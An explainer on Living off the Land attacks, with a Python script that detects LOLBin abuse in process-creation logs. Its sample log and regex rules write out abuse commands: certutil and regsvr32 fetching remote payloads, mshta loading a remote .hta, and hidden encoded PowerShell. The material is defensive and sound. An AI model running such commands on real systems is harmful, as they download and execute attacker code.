
Living off the Land (LotL)

An attack technique that leverages legitimate system tools (PowerShell, WMI, certutil) instead of malware - making detection significantly harder.

What is Living off the Land?

Living off the Land (LotL) is a technique in which an attacker abuses legitimate tools and features already present in the victim's operating system instead of deploying custom malware. Tools such as PowerShell, WMI, PsExec, certutil, mshta, regsvr32 and bitsadmin are used to carry out the later phases of the attack: payload download, execution, persistence and lateral movement.

The term LOLBins (Living off the Land Binaries) refers to legitimate Windows (and Linux) system executables that can be abused for offensive purposes. The LOLBAS project (LOLBins, LOLLibs, LOLScripts) documents hundreds of such tools and methods of abuse.

The LotL technique is particularly effective for four reasons: the tools are already present on the system, so nothing new needs to be written to disk; they are signed by Microsoft, so signature-based antivirus has no malicious file to flag; their use blends in with normal administrative activity; and the malicious logic lives in command lines, scripts and process memory rather than in a dropped executable (a fileless attack). Note that fileless does not mean traceless: the command lines, script blocks and network connections are still observable if they are logged.

Why does it matter?

Traditional signature-based antivirus is ineffective against LotL attacks because there is no malicious file to match. Detection has to be behavioural: the question is not whether certutil or mshta is malicious (it is not) but how it is being invoked, by which parent process and with which arguments. The foundation is process creation logging that captures the full command line (Sysmon Event ID 1, or Windows Security Event ID 4688 with command-line auditing enabled). On top of that, EDR with behavioural analysis, PowerShell logging (Script Block Logging, Event ID 4104), WMI subscription monitoring and proactive threat hunting are the key defensive elements against these techniques.
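The following is an added example, not code from the original page, showing what "monitoring how the tool is used" looks like in practice. It runs a small set of behavioural rules over process-creation events. The log lines are constructed for this example in a simplified `ParentImage|Image|CommandLine` layout that mimics the fields of Sysmon Event ID 1; the rule names and the parent/child heuristic are this example's own choices, while the command-line patterns they match (certutil -urlcache, mshta with a URL, regsvr32 /i: with scrobj.dll, bitsadmin /transfer, encoded PowerShell) are documented LOLBAS abuses. Benign uses of the same binaries are included to show that the rules key on arguments and context, not on the binary name.

```python
"""Behavioural detection of LOLBin abuse over process-creation events.

Added example, not part of the original page. SAMPLE_LOG is constructed,
not captured from a real host; the line format is a simplified stand-in
for Sysmon Event ID 1 fields (ParentImage, Image, CommandLine).
"""
from __future__ import annotations

import re
from dataclasses import dataclass


@dataclass
class ProcessEvent:
    parent: str
    image: str
    cmdline: str


# (rule name, image basename, regex over the command line).
# Each regex describes a documented abuse pattern, not normal admin use.
RULES = [
    ("certutil download", "certutil.exe",
     re.compile(r"-urlcache\b.*\bhttps?://", re.I)),
    ("certutil decode", "certutil.exe",
     re.compile(r"-decode\b", re.I)),
    ("mshta remote script", "mshta.exe",
     re.compile(r"(https?://|vbscript:|javascript:)", re.I)),
    ("regsvr32 scriptlet", "regsvr32.exe",
     re.compile(r"/i:\S*https?://|scrobj\.dll", re.I)),
    ("bitsadmin transfer", "bitsadmin.exe",
     re.compile(r"/transfer\b", re.I)),
    ("rundll32 script host", "rundll32.exe",
     re.compile(r"javascript:|vbscript:", re.I)),
    ("powershell encoded/download", "powershell.exe",
     re.compile(r"(?:^|\s)-e(?:nc|ncodedcommand)?\s|downloadstring|\biex\b|invoke-expression", re.I)),
]

# Heuristic (this example's choice): an Office application spawning any
# LOLBin is suspicious regardless of arguments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
LOLBINS = {rule[1] for rule in RULES} | {"wmic.exe", "cscript.exe", "wscript.exe"}


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def parse_line(line: str) -> ProcessEvent:
    """Parse the constructed 'Key=Value|Key=Value|Key=Value' format."""
    fields = dict(part.split("=", 1) for part in line.split("|", 2))
    return ProcessEvent(fields["ParentImage"], fields["Image"], fields["CommandLine"])


def classify(event: ProcessEvent) -> list[str]:
    """Return the names of every rule the event matches (empty if benign)."""
    hits = []
    img = basename(event.image)
    parent = basename(event.parent)
    for name, rule_image, pattern in RULES:
        if img == rule_image and pattern.search(event.cmdline):
            hits.append(name)
    if parent in OFFICE_PARENTS and img in LOLBINS:
        hits.append(f"office app spawned {img}")
    return hits


def scan(lines: list[str]) -> list[tuple[int, list[str]]]:
    """Return (line index, rule hits) for every event that matched a rule."""
    findings = []
    for i, line in enumerate(lines):
        hits = classify(parse_line(line))
        if hits:
            findings.append((i, hits))
    return findings


# Constructed sample events: three benign uses of the same binaries,
# followed by four LOLBin abuse patterns.
SAMPLE_LOG = [
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -hashfile C:\setup.msi SHA256",
    r"ParentImage=C:\Windows\System32\services.exe|Image=C:\Windows\System32\svchost.exe|CommandLine=svchost.exe -k netsvcs",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -NoProfile -File C:\scripts\backup.ps1",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\certutil.exe|CommandLine=certutil -urlcache -split -f http://203.0.113.10/payload.txt C:\Users\Public\p.txt",
    r"ParentImage=C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE|Image=C:\Windows\System32\mshta.exe|CommandLine=mshta http://203.0.113.10/a.hta",
    r"ParentImage=C:\Windows\System32\cmd.exe|Image=C:\Windows\System32\regsvr32.exe|CommandLine=regsvr32 /s /n /u /i:http://203.0.113.10/x.sct scrobj.dll",
    r"ParentImage=C:\Windows\explorer.exe|Image=C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe|CommandLine=powershell.exe -nop -w hidden -enc SQBFAFgA",
]


if __name__ == "__main__":
    for index, hits in scan(SAMPLE_LOG):
        print(f"line {index}: {', '.join(hits)}")
```

The first three events (a file hash check, a service host, a scheduled backup script) produce no hits even though two of them run LOLBins, while the last four are flagged on arguments or on the Office parent. In production the same logic is expressed as EDR or SIEM rules over real Sysmon or 4688 telemetry, and the rule set is tuned against the organisation's own baseline of administrative activity.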
